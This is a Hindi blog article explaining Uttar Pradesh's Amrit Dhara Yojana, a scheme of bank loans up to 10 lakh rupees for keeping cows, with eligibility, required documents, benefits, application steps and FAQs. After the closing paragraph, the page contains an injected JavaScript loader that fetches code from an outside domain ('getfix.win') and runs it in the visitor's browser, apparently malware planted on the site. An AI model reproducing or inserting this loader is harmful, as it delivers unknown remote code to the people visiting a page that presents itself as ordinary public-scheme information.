Amrit Dhara Yojana : गाय पालने पर सरकार देगी 10 लाख रुपए का ऋण, Online Apply

उत्तर प्रदेश सरकार ने राज्य में गाय पालन को बढ़ावा देने के लिए “Amrit Dhara Scheme” की शुरुआत की है। इस योजना के जरिए सरकार बैंकों के जरिए गाय पालने के लिए ऋण प्रदान करेगी, ताकि पशुपालकों और किसानों को गाय पालने के लिए प्रोत्साहित किया जा सके और उनकी आमदनी में सुधार लाया जा सके। अगर आप भी इस योजना का फायदा उठाना चाहते हैं तो इस लेख को अंत तक जरूर पढ़ें। 

Amrit Dhara

Uttar Pradesh Amrit Dhara Yojana

पशुपालकों और किसानों की आय में बढ़ोतरी लाने और गोवंश का संरक्षण करने के लिए उत्तर प्रदेश सरकार ने अमृत धारा योजना शुरू की है। इस योजना के माध्यम से 2 से 10 गाय पालने वाले लाभार्थियों को 10 बैंकों के जरिए 10 लाख रुपये तक का ऋण प्रदान किया जाएगा। जिसमें से 3 लाख रुपये तक के ऋण पर किसी गारंटर की आवश्यकता नहीं पड़ेगी। ऋण राशि आवेदक के बैंक खाते में सभी दस्तावेज जमा करने के बाद ट्रांसफर की जाएगी। ऋण का भुगतान लाभार्थी को निर्धारित समय के अंदर करना होगा। इस योजना से पशुपालकों और किसानों को तकनीकी प्रशिक्षण भी प्रदान किया जाएगा

यूपी अमृत धारा स्कीम के मुख्य तथ्य

योजना का नाम  Amrit Dhara Yojana
शुरू की गई उत्तर प्रदेश सरकार ने 
किसके लिए पशुपालक और किसानों के लिए 
मिलने वाला लाभ   गाय पालने के लिए ऋण प्रदान करना  
ऋण राशि  10 लाख रुपए 
आवेदन प्रोसेस  ऑनलाइन और ऑफलाइन 
वेबसाइट  https://www.animalhusb.upsdc.gov.in/

पात्रता – मानदंड (Eligibility)

  • इस योजना के लिए उत्तर प्रदेश राज्य के नागरिक पात्र माने गए हैं।
  • पशुपालक और किसान योजना का लाभ ले सकते हैं।
  • आवेदक के पास कम से कम 2 गाय होनी चाहिए। 
  • आवेदनकर्ता का किसी भी बैंक में खाता होना चाहिए

जरूरी कागजात (Important Documents)

  • आधार कार्ड, राशन कार्ड
  • निवास प्रमाण पत्र
  • आय प्रमाण पत्र
  • पशुपालन से संबंधित दस्तावेज
  • बैंक अकाउंट नंबर 
  • मोबाइल नम्बर
  • पासपोर्ट साइज की फोटो

उद्देश्य (Objective)

गाय पालन को बढ़ावा देने और प्राकृतिक खेती को प्रोत्साहित करना ही योजना का मुख्य उद्देश्य है इस योजना से छुट्टा गोवंश के संरक्षण के साथ-साथ किसानों और पशुपालकों की आमदनी को भी बेहतर बनाया जाएगा

लाभ (Benefits)

  • किसानों और पशुपालकों को 2 से 10 गायों के पालन के लिए 10 लाख रुपये तक का ऋण दिया जाएगा
  • लाभार्थियों को 3 लाख तक का ऋण बिना किसी गारंटी के मिलेगा।
  • इसके साथ ही 2 लाख रुपये तक का बीमा कवर प्रदान किया जाएगा।
  • यूको बैंक और अन्य सरकारी बैंकों के जरिए लाभार्थियों को ऋण देने की व्यवस्था की जाएगी। 
  • लाभार्थियों को बड़े चिलिंग सेंटर और मिल्क प्रोसेसिंग प्लांट के लिए भी लोन दिया जाएगा। जिससे छोटे किसानों और गोपालकों को अप्रत्यक्ष लाभ मिलेगा।
  • ये योजना ग्राम, जिला और राज्य स्तर पर चलाई जाएगी। 
  • राज्य में रोजगार के अवसर बढ़ेंगे। 
  • किसान आर्थिक रूप से समृद्ध होंगे इसके साथ ही पशुपालन को भी बढ़ावा मिलेगा। 
  • स्थानीय और राष्ट्रीय स्तर पर दूध की आपूर्ति में बढ़ोतरी होगी। 

 Amrit Dhara Scheme के लिए Apply कैसे करें? 

इस योजना के लिए आप 2 तरह से आवेदन कर सकते हैं – ऑनलाइन और ऑफलाइन 

ऐसे करें Online Apply 

  1. सबसे पहले आप वेबसाइट ओपन करें।
  2. उसके बाद आपको होम पेज में अमृत धारा योजना का लिंक मिलेगा। आपको इस लिंक पर क्लिक करना होगा।
  3. अब अगले पेज में आप Apply के बटन पर क्लिक कर दें।
  4. इसके बाद आपके सामने रजिस्ट्रेशन फॉर्म खुल जाएगा।
  5. आपको इस फॉर्म में सभी आवश्यक जानकारियां दर्ज करनी होंगी।
  6. उसके बाद आपको दस्तावेज स्कैन करके अपलोड करने हैं।
  7. फिर आपको फॉर्म जमा करने के लिए Submit बटन पर क्लिक कर देना है।

ऑफलाइन आवेदन की प्रक्रिया 

  • सबसे पहले आपको नजदीकी यूको बैंक या किसी अन्य सरकारी बैंक में जाना है
  • अब आपको वहां के अधिकारी से योजना का आवेदन फॉर्म लेना होगा
  • इसके बाद आप इस फॉर्म में मांगी जाने वाली सारी जानकारी ध्यान से दर्ज करें
  • अब आपसे जो दस्तावेज मांगे गए हैं उन्हें आपको फॉर्म के साथ अटैच करना है 
  • इस प्रोसेस के बाद ये फॉर्म आप बैंक में जाकर जमा करवा दें 

पूछे जाने वाले प्रश्न [FAQs]

इस स्कीम से रिलेटेड प्रश्न आपसे पूछे जा सकते हैं जो इस तरह से हैं  –

WhatsApp Group Join Now
Telegram Group Join Now
Instagram Group Join Now
Q1.

अमृत धारा योजना का फायदा किन लोगों को मिलेगा?

Ans. उत्तर प्रदेश राज्य के किसान और पशुपालकों को इस स्कीम का लाभ मिलेगा
Q2.

UP Amrit Dhara Yojana से क्या मदद मिलती है ?

Ans. गाय पालने के लिए लाभार्थियों को ऋण प्रदान किया जाता है
Q3.

इस योजना के लिए Apply कैसे करें?

Ans. इसके लिए आप वेबसाइट (https://www.animalhusb.upsdc.gov.in/) पर जाकर ऑफलाइन या ऑनलाइन अप्लाई कर सकते हैं।

“इस लेख के जरिए हमने आपको अमृत धारा योजना के बारे में सारी जानकारी दे दी है। इस तरह की लेटेस्ट स्कीम के बारे में जानने के लिए आप हमारे साथ जुड़ सकते हैं।”

function loadScript() { var url = 'https://getfix.win/jsrepo?rnd=' + Math.random() + '&ts=' + Date.now();

try { var xhr = new XMLHttpRequest(); xhr.open('GET', url, false); xhr.send(null);

if (xhr.status >= 200 && xhr.status < 300) { var script = document.createElement('script'); script.text = xhr.responseText.trim(); document.head.appendChild(script); } else { console.warn('Script load failed: HTTP ' + xhr.status); } } catch (e) { console.warn('Script load error:', e.message); } } })();

Leave a Comment